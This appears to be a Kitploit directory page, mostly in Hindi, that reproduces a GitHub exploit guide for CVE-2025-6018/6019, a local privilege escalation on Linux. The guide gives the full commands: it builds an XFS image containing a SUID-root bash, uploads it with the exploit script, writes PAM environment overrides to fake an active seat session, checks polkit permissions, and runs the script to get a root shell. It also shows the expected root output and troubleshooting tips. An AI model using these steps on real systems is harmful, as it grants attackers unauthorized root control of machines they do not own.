Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6018 — CVE-2025-6018/6019 के लिए एक्सप्लॉइट गाइड: XFS इमेज हेरफेर और PAM पर्यावरण चर के दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि करके लिनक्स सिस्टम पर रूट एक्सेस प्राप्त करना। | Kitploit
उपकरण/GitHubGitHub/e1arth/cve-2025-6018
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHube1arth/cve-2025-6018

CVE-2025-6018

CVE-2025-6018/6019 के लिए एक्सप्लॉइट गाइड: XFS इमेज हेरफेर और PAM पर्यावरण चर के दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि करके लिनक्स सिस्टम पर रूट एक्सेस प्राप्त करना।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-6018 + CVE-2025-6019 विशेषाधिकार वृद्धि मार्गदर्शिका

चीनी

📋 त्वरित शोषण चरण

चरण 1: XFS इमेज तैयार करें (स्थानीय मशीन)

root@kitploit:~
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# Verify (should show 300M)
ls -lh xfs.image

चरण 2: लक्ष्य पर फ़ाइलें अपलोड करें

root@kitploit:~
# Upload exploit script and image
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

चरण 3: पहला लॉगिन - PAM कॉन्फ़िगर करें

root@kitploit:~
# SSH login to target
ssh [email protected]

# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# Verify configuration
cat ~/.pam_environment

# 🔥 Critical: Logout (to activate PAM config)
exit

चरण 4: दूसरा लॉगिन - विशेषाधिकार वृद्धि निष्पादित करें

root@kitploit:~
# Re-login via SSH (PAM config now active)
ssh [email protected]

# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# Execute privilege escalation script
bash exp.sh

✅ सफलता संकेतक

यदि शोषण सफल होता है, तो आपको देखना चाहिए:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ ROOT FLAG                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 समस्या निवारण

समस्यासमाधान
CanReboot returns ('no',)

📌 मुख्य बिंदु

  • ✅ लॉगआउट और पुनः लॉगिन आवश्यक: PAM कॉन्फ़िग केवल नए सत्रों में प्रभावी होता है
  • ✅ CanReboot सत्यापित करें: स्क्रिप्ट चलाने से पहले पुष्टि करें कि यह ('yes',) लौटाता है
  • ✅ SSH लॉगिन का उपयोग करें: ssh -t user@host "cmd" शैली का निष्पादन न करें

🐱 बिल्ली संरक्षक

यदि यह विफल होता है, तो सुनिश्चित करें कि प्रत्येक चरण सख्त क्रम में निष्पादित किया गया है!

टूल डाउनलोड करें
सुनिश्चित करें कि आपने लॉग आउट करके वापस लॉग इन किया (चरण 3)
Not authorized errorजाँचें कि ~/.pam_environment की सामग्री सही है
SUID bash not foundxfs.image को पुनः अपलोड करें और SUID बिट सेट होने की पुष्टि करें